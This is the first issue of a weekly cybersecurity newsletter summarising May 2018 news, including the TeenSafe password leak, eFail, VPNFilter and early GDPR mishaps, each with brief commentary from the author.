CyberWeekly - The first
Welcome to CyberWeekly, a weekly roundup of news, articles, long form blog posts and various other miscellania that interests your author, Michael Brunton-Spall.
Replies to this email will come straight to me, so just hit reply to send me feedback, comments or links or tweet it at me @bruntonspall.
Weekly Threat Report 18th May 2018 - NCSC Site
"A security researcher allegedly gained access to the development environment because both the username and password were set to “admin”, which was most likely the default setting for the environment." If you have admin users, you shouldn’t have a single user called admin. It implies shared credentials and a lack of good role based access control.
Teen phone monitoring app leaked thousands of user passwords | ZDNet The database stores the parent's email address associated with TeenSafe, as well as their corresponding child's Apple ID email address. “The data contains the plaintext passwords for the child's Apple ID. Because the app requires that two-factor authentication is turned off”. Note this was not a “traditional database” but a celery queue according to the screen shots. Your message queue needs to not transmit plaintext as well as your database storage system. Additionally, services that require 2FA to be turned off are decidedly worrying.
Here's How eFail Attack Works Against PGP and S/MIME Encrypted Emails This is a good description of eFail. If the encrypted contents is decoded and the resultant html includes an image link with the contents in the url, the attacker gets the content.
Risk Acceptance 101: What Happens When Security Needs Go Unfunded? “The only way to address these challenges is to make sure security needs are funded when and where possible, as soon as possible.”. While security is about buying magical black boxes and investing in cool sounding technologies, this will never work. Until CISO’s realise that they must be enablers of business rather than the department of no we won't see funding fixed. How I used a simple Google query to mine passwords from dozens of public Trello boards "Note: I used a Google dork query, sometimes referred to as a dork. It is a search string that uses advanced search operators to find information that is not readily available on a website" - while the linked article about Trello is interesting in it's own right, knowing more about Google advanced queries (I dislike the term Dork) for things such as site search is valuable for using google for security analysis
Cisco's Talos Intelligence Group Blog: VPNFilter Looks like “an actor” is attacking a variety of routers, compromising them and maintaining that compromise to use later. Which is an interesting behaviour to notice, mostly because it’s a threat that hasn’t properly manifested yet, but implies a bad payoff coming.
[Since I wrote this originally, the US Government has taken over a command and control server to mitigate this to some degree] Ghostery GDPR Email - Imgur Ghostery, the privacy preserving plugin for browsers, has accidentally sent their batch emails about GDPR to registered users using the to field, revealing other customers email addresses, which are of course personal details. I think this might be the first breach under GDPR that I've seen.
/via https://www.reddit.com/r/technology/comments/8m45k6/ghostery_have_exposed_everyones_email_address_in/
The gdpr hall of shame
Showing some of the worst or most interesting gdpr emails sent out this week
Costly Cloud Breaches Putting Digital Transformation Strategies at Risk, Finds Kaspersky Lab "But this rise of ‘data on the go’ is presenting new security issues, with the most expensive incidents related to cloud environments and data protection. Two out of three of the most expensive cybersecurity incidents affecting SMBs are related to the cloud, where 3rd party hosted IT infrastructure failures bring an average $179K loss." -- For me, this definition of cloud is a little peculiar. Hosting your data with a third party has been the norm for decades, but when it was a systems integrator, we didn't consider it as big a risk. This just underlines to me that supplier selection is incredibly important for security people.
TV Advert for MI6
"Secretly, we're just like you" This is the first ever advert for SIS broadcast, and aims to counter the myth that MI6 officers must be James Bond, which I assume affects their recruitment capabilities
That's all for this week. See you next week.
Michael